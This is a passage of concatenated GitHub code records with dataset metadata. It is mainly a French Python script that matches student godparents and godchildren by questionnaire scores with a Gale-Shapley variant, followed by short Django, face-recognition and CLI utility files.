"hantop/CN-Trade", "sub_path": "strategies/based_on_5day_change.py", "file_name": "based_on_5day_change.py", "file_ext": "py", "file_size_in_byte": 1104, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "get_cn_data.stock_data", "line_number": 7, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}]}
+{"seq_id": "6316971321", "text": "from __future__ import unicode_literals\nimport random\nfrom copy import copy\nimport xlrd\nfrom xlrd import open_workbook\nimport xlwt\nimport numpy as np\n\n\"\"\"Ce qui suit est une partie d'un code trouvé sur internet que j'ai modifié pour le faire marcher bien dans\nle cas des familles de parrainage.\nPour obtenir les familles sans essayer de comprendre le code, aller à la fin de ce document.\nNe pas oublier de mettre 'individual.py' dans le même dossier afin de pouvoir l'importer \"\"\"\n\nclass Individual():\n #constructeur :\n def __init__(self, nom, reponses, famille):\n self.nom = nom\n self.reponses = reponses[:-1]\n self.famille=-1\n for x in famille:\n if x[1]==nom:\n self.famille=x[0]\n self.preference_list = []\n self.available_proposals = []\n self.partner = None\n self.moy_lovesc=-1\n\n #Fonction de copie :\n def copiage(self):\n cop=Individual(\"\",[],[])\n cop.nom = self.nom\n cop.reponses = self.reponses\n cop.famille=self.famille\n cop.preference_list =[]\n cop.available_proposals =[]\n cop.partner = None\n cop.moy_lovesc= -1\n return(cop)\n\n \"\"\"Si ça marche pas, peut être que dé-commenter la section ci-dessus résolvera le problème\n (idem que pour la classe MarriagesSimulation, je me sers pas de tout mais je me rapelle plus si ce dont\n je me sert plus je peux le supprimer ou pas, donc je l'ai commenté au cas ou)\"\"\"\n\n output = ('nom={0} '\n 'partner={1}'.format(\n self.nom,\n self.partner.nom if self.partner else None))\n return output\n\n\n## Lovescore\n\n#On configure un tableau pour pondérer les réponses :\nponde = [4,2,1,1,2,2,1,1,3,6,3,15,7] #A modifier selon l'ordre des questions\n\ndef moyenne(l):\n s=0\n for x in l:\n s+=x\n return(s/len(l))\n\ndef LoveScore(Romeo,Juliet,p=ponde):\n r1,r2=Romeo.reponses, Juliet.reponses\n nbReponses = len(r1)\n s=0\n for k in range(nbReponses): #On commence a 2 pour éviter le nom et la famille\n if k ==0 : #traitement spécial pour les listes\n for x in r1[k]:\n if x in r2[k]:\n if x==\"Pas de liste\":\n s-=3*p[k]\n else:\n s-=p[k]\n elif k == 2 : #idem pour la musique\n for x in r1[k]:\n if x in r2[k]:\n if x==\"Je suis aigri et j'aime pas la musique\":\n s-=3*p[k]\n else:\n s-=p[k]\n elif k == 3: #idem pour les centre d'intérêts artistiques\n for x in r1[k]:\n if x in r2[k]:\n if x==\"pas du tout\":\n s-=3*p[k]\n else:\n s-=p[k]\n elif k == 7: #idem pour le type de sport pratiqué\n for x in r1[k]:\n if x in r2[k]:\n if x==\"Pas de sport\":\n s=s\n else:\n s-=p[k]\n elif k == 6: #pour le but du sport on test juste l'égalité des deux\n if r1[k]!=r2[k]:\n s+=2*p[k]\n else:\n s+=abs(r1[k]-r2[k])*p[k] #Si ils répondent la même chose 0 points, plus il y a de points au total moins le match est bon\n return (max(s,0))\n\n#Modifier la fonction LoveScore si jamais le système de notation n'est pas satsfaisant\n\n## Marriage\n\nclass MarriagesSimulation():\n \"\"\"A simulation of men and women being matched with the Gale-Shapley\n algorithm.\"\"\"\n \"\"\"Ca je l'ai pris sur internet (flemme de faire un truc qui existe déjà) du coup comme j'ai modifié\n le reste de l'algo il y a des sections de MarriagesSimulation qui servent plus, mais comme ça fait\n longtemps je me rappelle plus si je peux les supprimer sans tout faire buger ou pas, du coup je laisse\"\"\"\n\n #Constructeur :\n def __init__(self, men,women):\n \"\"\"Initialize the fundamental components of the simulation.\n\n Args:\n size: The size of the simulation, in numbers of men, which will be\n the same as the number of women.\n 
\"\"\"\n self.men = men\n self.women = women\n self.size = len(men)\n self.sizew = len(women)\n fammax=-1\n for man in self.men :\n if man.famille>fammax:\n fammax=man.famille\n self.fmax=fammax\n\n #Fusion de deux mariage\n def merge(self,M2):\n self.men+=M2.men\n self.women+=M2.women\n self.size+=M2.size\n self.sizew+=M2.sizew\n self.fmax=max(M2.fmax,self.fmax)\n\n\n def debut(self):\n \"\"\"Pour remplir les available_proposals\"\"\"\n for i in self.men:\n i.available_proposals=self.women\n\n #Renvoie le nombre de parrain par famille :\n def fam_taille(self):\n taille=[0 for i in range(self.fmax+1)]\n for man in self.men :\n taille[man.famille]+=1\n return(taille)\n\n #Permet d'ajouter des parrains \"fantôme\" dans le cas où il y a plus de fillots que de parrains :\n def ajout_p(self):\n taille=self.fam_taille()\n nb_ajout=0\n men=[]\n for i in range(self.fmax+1):\n if taille[i]!=7:\n k=0\n man=self.men[0]\n while man.famille!=i:\n k+=1\n man=self.men[k]\n new=man.copiage()\n men.append(new)\n nb_ajout+=1\n return(men,nb_ajout)\n\n def populate(self):\n \"\"\"Populate the simulation with valid men and women.\"\"\"\n for i in range(0, self.size):\n self.men.append(Individual(i))\n for i in range(self.size, self.size * 2):\n self.women.append(Individual(i))\n\n def set_preferences(self):\n \"\"\"Set the preference list for all the men and women in this\n simulation.\"\"\"\n self.Moy_lovscore()\n women=self.tri_lovesc_women()\n for man in self.men:\n man.preference_list =[self.women[x[0]] for x in women]\n man.available_proposals =man.preference_list\n\n #Calcul de la moyenne de Lovescore pour chaque individu :\n def Moy_lovscore(self):\n echantw=[i for i in range(self.sizew)]\n echant=[i for i in range(self.size)]\n for man in self.men:\n random.shuffle(echant)\n love=[LoveScore(man,self.women[echantw[i]]) for i in range(self.sizew)]\n man.moy_lovesc=moyenne(love)\n for woman in self.women:\n random.shuffle(echant)\n love=[LoveScore(woman,self.men[echant[i]]) for i in range(self.size)]\n woman.moy_lovesc=moyenne(love)\n\n #Ordone les parrains par moyenne de Lovescore décroissant:\n def tri_lovesc_men(self):\n a=np.array([])\n type_men=[('pers',type(self.men[1])),('lv_sc',int)]\n men_sorted=np.array([(man,man.moy_lovesc) for man in self.men],dtype=type_men)\n men_sorted=np.sort(men_sorted,order=\"lv_sc\")\n return(men_sorted)\n\n #Ordone les fillots par moyenne de Lovescore décroissant:\n def tri_lovesc_women(self):\n type_women=[('pers',int),('lv_sc',int)]\n women_sorted=(np.array([(i,self.women[i].moy_lovesc) for i in range(self.sizew)],dtype=type_women))\n women_sorted.sort(order=\"lv_sc\")\n women_sorted=women_sorted.tolist()\n women_sorted.reverse()\n return(women_sorted)\n\n #Calcul le poids(Lovescore cummulé de tous les matchs) total du marriage et les parrains non matché (permet d'évaluer la performance du match):\n def poids(self):\n pds=0\n non_match=0\n for man in self.men:\n if man.partner==None:\n non_match+=1\n else:\n pds+= LoveScore(man.partner,man)\n return(pds,non_match)\n\n def random_id_list(self):\n \"\"\"Get a randomized list of indexes that may be used to refer to\n internal lists of men and women.\n\n Returns:\n A randomized list of indexes.\n \"\"\"\n id_list = [k for k in range(0, self.size)]\n random.shuffle(id_list)\n return id_list\n\n def random_idw_list(self):\n \"\"\"Get a randomized list of indexes that may be used to refer to\n internal lists of men and women.\n\n Returns:\n A randomized list of indexes.\n \"\"\"\n id_list = [k for k in range(0, 
self.sizew)]\n random.shuffle(id_list)\n return id_list\n\n def random_man_list(self):\n \"\"\"Get a randomized list of men from this simulation.\n\n Returns:\n A random list of Man objects.\n \"\"\"\n random_id_list = self.random_id_list()\n man_list = []\n for i in random_id_list:\n man_list.append(self.men[i])\n return man_list\n\n def random_woman_list(self):\n \"\"\"Get a randomized list of women from this simulation.\n\n Returns:\n A random list of Woman objects.\n \"\"\"\n random_id_list = self.random_idw_list()\n woman_list = []\n for i in random_id_list:\n woman_list.append(self.women[i])\n return woman_list\n\n def is_stable(self):\n \"\"\"Check if this simulation has reached a stable state.\n\n The simulation is considered stable if both members of a couple would\n not be happier with an alternative match.\n\n Returns:\n A boolean indicating the stability of this simulation.\n \"\"\"\n for woman in self.women:\n if not woman.partner:\n return False\n return True\n\n def pair_couple(self, man, woman):\n \"\"\"Pair two individuals.\n\n The man in this couple will no longer be able to propose\n to the specified woman.\n\n Args:\n man: The first individual.\n woman: The second individual.\n \"\"\"\n man.partner = woman\n woman.partner = man\n\n def free_couple(self, man, woman):\n \"\"\"Free two individuals.\n\n Args:\n man: The first individual.\n woman: The second individual.\n \"\"\"\n man.partner = None\n woman.partner = None\n\n def match(self):\n \"\"\"Perform the Gale-Shapley matching algorithm.\n\n Print new matches that are made and the state of the simulation\n between iterations.\n \"\"\"\n iterations = 0\n flts=0\n while not self.is_stable() and iterations<=100:\n iterations += 1\n s=0\n for man in self.men:\n s+=len(man.available_proposals)\n if not man.partner:\n for woman in man.available_proposals:\n if not woman.partner:\n\n self.pair_couple(man, woman)\n man.available_proposals.remove(woman)\n flts+=1\n break\n else:\n\n if LoveScore(man,woman) < LoveScore(woman.partner, woman):\n\n self.free_couple(woman.partner, woman)\n self.pair_couple(man, woman)\n man.available_proposals.remove(woman)\n break\n else:\n man.available_proposals.remove(woman)\n print(\"nb fillots ----> \", flts)\n\n\n def famille_liste(self): #récupère la liste des familles inscrites\n F=[]\n for man in self.men:\n if not(man.famille in F):\n F.append(man.famille)\n return(F)\n\n #Rempli le Excel avec les familles :\n def ecriture(self):\n wb = xlwt.Workbook('familles.xls') #création d'un fichier excel\n s = wb.add_sheet('A Test Sheet') #on crée une feuill de calcul\n familles=self.famille_liste()\n nbfam=len(familles)\n nb_membre_fam=[0 for x in familles] #stock le nombre de membre écrit dans chaque famille\n # écriture des entêtes :\n filts=0\n for i in range((nbfam//10)):\n x=3*i\n for j in range(10):\n y=10*j\n s.write(y,x+1,(10*i)+j+1,style_entete_d)\n s.write(y,x,\"Nom de la famille : \",style_entete_g)\n s.write(y+1,x,\"Parrains :\",style_parrains_ent)\n s.write(y+1,x+1,\"Fillots :\",style_fillots_ent)\n for j in range(nbfam%10):\n y=10*j\n x=(nbfam//10)*3\n s.write(y,x+1,Familles_g[(nbfam//10)*10+j][0],style_entete_d)\n s.write(y,x,\"Nom de la famille : \",style_entete_g)\n s.write(y+1,x,\"Parrains :\",style_parrains_ent)\n s.write(y+1,x+1,\"Fillots :\",style_fillots_ent)\n # écriture des noms :\n for man in self.men:\n famille=man.famille\n x=(famille//10)*3\n y=10*(famille%10)+2+nb_membre_fam[famille]\n if nb_membre_fam[famille]!=6:\n s.write(y,x,man.nom,style_parrains)\n if 
man.partner!=None :\n s.write(y,x+1,man.partner.nom,style_fillots)\n filts+=1\n else :\n s.write(y,x+1,\" \",style_fillots)\n else:\n s.write(y,x,man.nom,style_parrains_fin)\n if man.partner!=None :\n s.write(y,x+1,man.partner.nom,style_fillots_fin)\n filts+=1\n else :\n s.write(y,x+1,\" \",style_fillots_fin)\n nb_membre_fam[famille]+=1\n # fin de la mise en page :\n for i in range(len(nb_membre_fam)):\n f=nb_membre_fam[i]\n for j in range(f,7):\n y=((10*((i)%10))+j)+2\n x=((i)//10)*3\n if j!=6:\n s.write(y,x,\" \",style_parrains)\n s.write(y,x+1,\" \",style_fillots)\n else:\n s.write(y,x,\" \",style_parrains_fin)\n s.write(y,x+1,\" \",style_fillots_fin)\n print(filts)\n wb.save('familles.xls')\n\n def __str__(self):\n men_outputs = []\n for man in self.men:\n men_outputs.append(u'\\t' + str(man))\n men_string = '\\n'.join(men_outputs)\n women_outputs = []\n for woman in self.women:\n women_outputs.append('\\t' + str(woman))\n women_string = '\\n'.join(women_outputs)\n return ('Men:\\n'\n '{0}\\n'\n 'Women:\\n'\n '{1}'.format(men_string, women_string))\n\n## Algo famille\n\n## Fonctions de lecture fichier\n#Ouverture des feuilles :\n\nparrains=xlrd.open_workbook(\"Questionnaire Parrain-Fillot (Parrains).xlsx\")\nshnp=parrains.sheet_names()\nshp=parrains.sheet_by_name(shnp[1]) #Feuille qui m'interresse\nshfam=parrains.sheet_by_name(shnp[3]) #feuille avec les familles\nshfampers=parrains.sheet_by_name(shnp[2]) #feuille avec les corespondances familles/personnes\n\ndef ListeFamille():\n n=shfam.ncols\n l=shfam.row_values(1)\n famille_id=[(l[i],i) for i in range(1,n)]\n return(famille_id)\n\ndef ListeFamille_Pers():\n n=shfampers.ncols\n l=[]\n fam_pers=[]\n for i in range(6):\n l.append(shfampers.row_values(i+1)[1:])\n for i in range(6):\n for k in range(len(l[i])):\n if l[i][k]!=\"\":\n fam_pers.append((k,(l[i][k])))\n return(fam_pers)\n\nFamilles_g=ListeFamille()\nCompFam=ListeFamille_Pers()\n\ndef ListeParrains():\n #EI2={} <-- Si on voulait faire avec un dictionnaire\n EI2=[]\n n=shp.ncols\n for k in range(1,shp.nrows):\n l=shp.row_values(k)\n #EI2[\"EI2\"+str(k)]=[l[1],l[2:n]] <-- Idem\n EI2+=[Individual(l[1],l[3:16],CompFam)]\n return(EI2)\n\nfillots=xlrd.open_workbook(\"Questionnaire Parrain-Fillot (fillots) (réponses).xlsx\")\nshnf=fillots.sheet_names() #Noms des feuilles\nshf=fillots.sheet_by_name(shnf[0]) #Feuille qui m'interresse\n\ndef ListeFillots():\n EI1=[]\n n=shf.ncols\n for k in range(1,shf.nrows):\n l=shf.row_values(k)\n EI1+=[Individual(l[1],l[3:16],CompFam)]\n return(EI1)\n\n\n## Exploitation des réponses\n\ndef transformationrep(EI):\n for i in EI:\n j=i.reponses\n j[0]=j[0].split(\", \")\n j[2]=j[2].split(\", \")\n j[3]=j[3].split(\", \")\n j[4]=int(j[4].replace(\"Seulement les soirs de pleine lune\",\"0\").replace(\"Une fois de temps en temps\",\"1\").replace(\"Quelques fois par semaine\",\"2\").replace(\"Une fois par jour\",\"3\"))\n j[5]=int(j[5].replace(\"Le dimanche à 15h32 s'il fait beau\",\"0\").replace(\"Une fois par semaine\",\"1\").replace(\"Plusieurs fois par semaine\",\"2\").replace(\"Une fois par jour\",\"3\"))\n j[7]=j[7].split(\", \")\n j[8]=int(j[8].replace(\"Alterner entre grec et coquillettes ça compte ?\",\"0\").replace(\"Oh oui, et les trucs bien gras ça me connait !\",\"1\").replace(\"J'aime cuisiner le WE ou quand j'ai le temps\",\"2\").replace(\"Je fais toujours attention à bien manger\",\"3\"))\n j[10]=int(j[10].replace(\"Jamais\",\"0\").replace(\"Une fois par mois\",\"1\").replace(\"Une fois par semaine\",\"2\").replace(\"Une fois par jour 
(voire plus)\",\"4\").replace(\"Plusieurs fois par semaine\",\"3\"))\n j[11]=int(j[11].replace(\"Tu viens pas\",\"0\").replace(\"Tu te poses dans un coin, chill !!\",\"1\").replace(\"Objectif grosse défonce\",\"2\").replace(\"T'enflammes le dancefloor\",\"3\"))\n return(EI)\n\n\ndef epure(EI): #Pas necessaire si vous trouvez un moyen d'authentifier chaque personne et que chaque\n #personne de réponde qu'une fois\n N=[] #liste des noms\n Nt=[] #liste des noms sans doublets\n L=[] #liste qui va contenir les Ei sans doublet\n for i in EI:\n N+=[i.nom]\n for i in N:\n if i in Nt:\n L[Nt.index(i)]=EI[N.index(i)]\n else:\n Nt+=[i]\n L+=[EI[N.index(i)]]\n return(L)\n## écriture\n\n#styles des cases (bordures et fond)\n\nstyle_entete_g= xlwt.easyxf('font: bold on, color black;\\\nborders: top_color black, bottom_color black, left_color black,\\\nleft thin, top thin,bottom thin;\\\npattern: pattern solid, fore_color white; align : horiz center ;protection:cell_locked false;')\n\nstyle_entete_d= xlwt.easyxf('font: bold on, color black;\\\nborders: top_color black, bottom_color black,right_color black ,\\\nright thin, top thin,bottom thin;\\\npattern: pattern solid, fore_color white; align : horiz center ;protection:cell_locked false;')\n\nstyle_fillots_ent= xlwt.easyxf('font: bold on, color black;\\\nborders:right_color black,\\\nright thin;\\\npattern: pattern solid, fore_color white; align : horiz center ;protection:cell_locked false;')\n\nstyle_parrains_ent= xlwt.easyxf('font: bold on, color black;\\\nborders:left_color black,\\\nleft thin;\\\npattern: pattern solid, fore_color white; align : horiz center ;protection:cell_locked false;')\n\nstyle_fillots= xlwt.easyxf('font: bold off, color black;\\\nborders:right_color black,\\\nright thin;\\\npattern: pattern solid, fore_color white; align : horiz center ;protection:cell_locked false;')\n\nstyle_parrains= xlwt.easyxf('font: bold off, color black;\\\nborders:left_color black,\\\nleft thin;\\\npattern: pattern solid, fore_color white; align : horiz center ;protection:cell_locked false;')\n\nstyle_fillots_fin= xlwt.easyxf('font: bold off, color black;\\\nborders: bottom_color black,right_color black,\\\nright thin,bottom thin;\\\npattern: pattern solid, fore_color white; align : horiz center ;protection:cell_locked false;')\n\nstyle_parrains_fin= xlwt.easyxf('font: bold off, color black;\\\nborders:bottom_color black,left_color black,\\\nleft thin,bottom thin;\\\npattern: pattern solid, fore_color white; align : horiz center ;protection:cell_locked false;')\n\n## Algo a lancer\n\ndef algo():\n P=transformationrep(ListeParrains()) #on récupère les informations des parrains\n\n F=transformationrep(ListeFillots()) #on récupère les informations des parrains\n M=MarriagesSimulation(P,F)\n M.set_preferences()\n M.match() #ca va tourner puis afficher les couples en premier Liste1, partenaire=Liste\n #Ajoute des parrains \"fantômes\" et refait des matchs dans le cas où il y ait plus de fillots que de parrains\n while M.sizew>M.size:\n nouv_fillots=[]\n a_enlever=[]\n for i in range(M.sizew):\n if M.women[i].partner==None:\n nouv_fillots.append((M.women[i]).copiage())\n a_enlever.append(i)\n for i in range(len(a_enlever)-1,-1,-1):\n inutile=M.women.pop(a_enlever[i])\n M.sizew-=1\n if nouv_fillots!=[]:\n nouv_parr,nbparr=M.ajout_p()\n M2=MarriagesSimulation(nouv_parr,nouv_fillots)\n M2.set_preferences()\n M2.match()\n M.merge(M2)\n M.ecriture() #Ecriture dans le Excel\n return(M)\n #, suivi de Liste2, partenaire= Liste1\n #Juste la première liste suffit 
donc\n", "repo_name": "wlucasw/Parrainage", "sub_path": "mariage_new.py", "file_name": "mariage_new.py", "file_ext": "py", "file_size_in_byte": 20907, "program_lang": "python", "lang": "fr", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.shuffle", "line_number": 190, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 209, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 234, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 245, "usage_type": "call"}, {"api_name": "xlwt.Workbook", "line_number": 352, "usage_type": "call"}, {"api_name": "xlrd.open_workbook", "line_number": 428, "usage_type": "call"}, {"api_name": "xlrd.open_workbook", "line_number": 465, "usage_type": "call"}, {"api_name": "xlwt.easyxf", "line_number": 513, "usage_type": "call"}, {"api_name": "xlwt.easyxf", "line_number": 518, "usage_type": "call"}, {"api_name": "xlwt.easyxf", "line_number": 523, "usage_type": "call"}, {"api_name": "xlwt.easyxf", "line_number": 528, "usage_type": "call"}, {"api_name": "xlwt.easyxf", "line_number": 533, "usage_type": "call"}, {"api_name": "xlwt.easyxf", "line_number": 538, "usage_type": "call"}, {"api_name": "xlwt.easyxf", "line_number": 543, "usage_type": "call"}, {"api_name": "xlwt.easyxf", "line_number": 548, "usage_type": "call"}]}
+{"seq_id": "70235018728", "text": "import openpyxl\nfrom django.http import HttpResponse\n\nfrom cciw.officers.views.utils.data_retention import DATA_RETENTION_NOTICES_TXT, DataRetentionNotice\nfrom cciw.utils import xl\nfrom cciw.utils.spreadsheet import ExcelBuilder\n\n\ndef spreadsheet_response(\n builder: ExcelBuilder,\n filename: str,\n *,\n notice: DataRetentionNotice | None,\n) -> HttpResponse:\n output = builder.to_bytes()\n\n if notice is not None:\n workbook: openpyxl.Workbook = xl.workbook_from_bytes(builder.to_bytes())\n sheet = workbook.create_sheet(\"Notice\", 0)\n c_header = sheet.cell(1, 1)\n c_header.value = \"Data retention notice:\"\n c_header.font = xl.header_font\n\n for row_idx, line in enumerate(notice_to_lines(notice), start=3):\n c = sheet.cell(row_idx, 1)\n c.value = line\n c.font = xl.default_font\n sheet.column_dimensions[\"A\"].width = 100\n\n output = xl.workbook_to_bytes(workbook)\n response = HttpResponse(output, content_type=builder.mimetype)\n response[\"Content-Disposition\"] = f\"attachment; filename={filename}.{builder.file_ext}\"\n return response\n\n\ndef notice_to_lines(notice: DataRetentionNotice) -> list[str]:\n txt = DATA_RETENTION_NOTICES_TXT[notice]\n return list(txt.split(\"\\n\"))\n", "repo_name": "cciw-uk/cciw.co.uk", "sub_path": "cciw/officers/views/utils/spreadsheets.py", "file_name": "spreadsheets.py", "file_ext": "py", "file_size_in_byte": 1284, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cciw.utils.spreadsheet.ExcelBuilder", "line_number": 10, "usage_type": "name"}, {"api_name": "cciw.officers.views.utils.data_retention.DataRetentionNotice", "line_number": 13, "usage_type": "name"}, {"api_name": "openpyxl.Workbook", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cciw.utils.xl.workbook_from_bytes", "line_number": 18, "usage_type": "call"}, {"api_name": "cciw.utils.xl", "line_number": 18, "usage_type": "name"}, {"api_name": "cciw.utils.xl.header_font", "line_number": 22, "usage_type": "attribute"}, {"api_name": "cciw.utils.xl", "line_number": 22, "usage_type": "name"}, {"api_name": "cciw.utils.xl.default_font", "line_number": 27, "usage_type": "attribute"}, {"api_name": "cciw.utils.xl", "line_number": 27, "usage_type": "name"}, {"api_name": "cciw.utils.xl.workbook_to_bytes", "line_number": 30, "usage_type": "call"}, {"api_name": "cciw.utils.xl", "line_number": 30, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 31, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 14, "usage_type": "name"}, {"api_name": "cciw.officers.views.utils.data_retention.DataRetentionNotice", "line_number": 36, "usage_type": "name"}, {"api_name": "cciw.officers.views.utils.data_retention.DATA_RETENTION_NOTICES_TXT", "line_number": 37, "usage_type": "name"}]}
+{"seq_id": "70758828009", "text": "from typing import Optional, List\r\nfrom facekeeper.core import RecognizerInterface\r\nfrom facekeeper.matcher import EmbeddingsMatcher\r\nimport face_recognition\r\nfrom PIL import Image\r\nimport numpy as np\r\nimport io\r\nimport base64\r\n\r\n\r\nclass Recognizer(RecognizerInterface):\r\n def __init__(self, model: str):\r\n self.model = model\r\n self.matcher = EmbeddingsMatcher()\r\n\r\n def get_id(self) -> str:\r\n return \"github.com/ageitgey/face_recognition:\" + self.model\r\n\r\n def calc_embedding(self, image: bytes) -> Optional[np.array]:\r\n img = read_file_to_array(image)\r\n embeddings = face_recognition.face_encodings(img, None, 1, self.model)\r\n if len(embeddings) != 1:\r\n return None\r\n\r\n return embeddings[0]\r\n\r\n def locate_faces(self, image: bytes) -> List[dict]:\r\n img = read_file_to_array(image)\r\n locations = face_recognition.face_locations(img, 1, \"fog\")\r\n result = []\r\n for i, location in enumerate(locations):\r\n top, right, bottom, left = location\r\n face = img[top:bottom, left:right]\r\n buffer = io.BytesIO()\r\n pil_image = Image.fromarray(face)\r\n pil_image.save(buffer, \"JPEG\")\r\n buffer = base64.b64encode(buffer.getvalue())\r\n result.append({\"top\": top, \"right\": right, \"bottom\": bottom, \"left\": left, \"contentBase64\": buffer})\r\n return result\r\n\r\n\r\ndef read_file_to_array(image_data: bytes, mode=\"RGB\") -> np.array:\r\n \"\"\"\r\n read_file_to_array(data bytes[, mode='RGB']) -> img\r\n .\r\n . The function load stream data to PIL.Image and returns converted\r\n . image as np.array\r\n .\r\n . @param image_data bytes\r\n . @param mode string.\r\n \"\"\"\r\n image = Image.open(io.BytesIO(image_data))\r\n if mode:\r\n image = image.convert(mode)\r\n return np.array(image)\r\n", "repo_name": "dairlair/facekeeper", "sub_path": "facekeeper/recognizer.py", "file_name": "recognizer.py", "file_ext": "py", "file_size_in_byte": 1899, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "facekeeper.core.RecognizerInterface", "line_number": 11, "usage_type": "name"}, {"api_name": "facekeeper.matcher.EmbeddingsMatcher", "line_number": 14, "usage_type": "call"}, {"api_name": "face_recognition.face_encodings", "line_number": 21, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 19, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 19, "usage_type": "attribute"}, {"api_name": "face_recognition.face_locations", "line_number": 29, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 34, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 35, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 35, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 37, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 27, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 52, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 52, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 42, "usage_type": "attribute"}]}
+{"seq_id": "8568054781", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Some description.\"\"\"\n\nimport logging\nimport argparse\nimport sys\n\nimport haircut.project\n\n\ndef main():\n\n if sys.version_info < (2,6) or sys.version_info > (2,8):\n raise SystemExit('Sorry, this code needs Python 2.6 or Python 2.7 (current: %s.%s)' % (sys.version_info[0], sys.version_info[1]))\n\n desc = \"Generate the scaffold for a basic python project.\"\n parser = argparse.ArgumentParser(description=desc)\n\n parser.add_argument(\"-p\", \"--project\", required=True,\n help=\"The name of the project directory.\")\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\",\n help=\"Increase output verbosity\")\n\n args = parser.parse_args()\n\n logging.basicConfig(format='%(asctime)s::%(levelname)s::%(module)s::%(message)s')\n logging.getLogger().setLevel(getattr(logging, 'INFO'))\n\n if args.verbose:\n logging.getLogger().setLevel(logging.DEBUG)\n\n return haircut.project.Base(args.project).generate()\n", "repo_name": "grilo/haircut", "sub_path": "haircut/cli.py", "file_name": "cli.py", "file_ext": "py", "file_size_in_byte": 1029, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.version_info", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.version_info", "line_number": 16, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 19, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 28, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 29, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 32, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 32, "usage_type": "attribute"}, {"api_name": "haircut.project.project.Base", "line_number": 34, "usage_type": "call"}, {"api_name": "haircut.project.project", "line_number": 34, "usage_type": "attribute"}, {"api_name": "haircut.project", "line_number": 34, "usage_type": "name"}]}
+{"seq_id": "21531729680", "text": "from django.shortcuts import render\n\n# Create your views here.\n\n\ndef index(request):\n return render(request, \"index.html\")\n\n\n# def is_odd_even(request, _number):\n# context = {\"number\": _number}\n\n# return render(request, \"is-odd-even.html\", context)\ndef check(request, _number):\n num = _number\n if num == 0:\n check = 0\n elif num % 2 == 0:\n check = \"짝수\"\n else:\n check = \"홀수\"\n context = {\"num\": num, \"check\": check}\n return render(request, \"is-odd-even.html\", context)\n\n\ndef calculate(request, _number, __number):\n num = _number\n num2 = __number\n context = {\n \"plus\": num + num2,\n \"minus\": num - num2,\n \"multiply\": num * num2,\n \"divide\": num // num2,\n }\n\n return render(request, \"calculate.html\", context)\n", "repo_name": "1c0332zz/TIL", "sub_path": "Django/3일차 변수의 절차/3일차 실습/p_0926_app/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 804, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.shortcuts.render", "line_number": 7, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 23, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 36, "usage_type": "call"}]}
+{"seq_id": "8827158314", "text": "from django.db.models import F\n\nfrom api.eligibility_criteria.models import CriteriaBlock, CriteriaBlockConnector, FundEligibilityCriteria\n\n\nclass CriteriaBlockPositionUpdateMixin:\n @staticmethod\n def get_auto_generated_next_block(criteria_block: CriteriaBlock):\n criteria_blocks_qs = CriteriaBlock.objects.filter(criteria=criteria_block.criteria)\n user_documents_block = criteria_blocks_qs.filter(\n is_user_documents_step=True\n ).first()\n if user_documents_block:\n return user_documents_block\n\n final_step_block = criteria_blocks_qs.filter(is_final_step=True).first()\n return final_step_block\n\n def get_next_block(self, criteria_block: CriteriaBlock):\n later_blocks = self.get_later_blocks(criteria_block=criteria_block)\n next_block = later_blocks.first()\n\n if not next_block:\n next_block = self.get_auto_generated_next_block(criteria_block=criteria_block)\n\n return next_block\n\n @staticmethod\n def get_block_by_position(criteria: FundEligibilityCriteria, position: int):\n return CriteriaBlock.objects.filter(\n criteria=criteria,\n position=position\n ).first()\n\n @staticmethod\n def get_previous_block(criteria_block: CriteriaBlock):\n criteria_blocks_qs = CriteriaBlock.objects.filter(criteria=criteria_block.criteria)\n 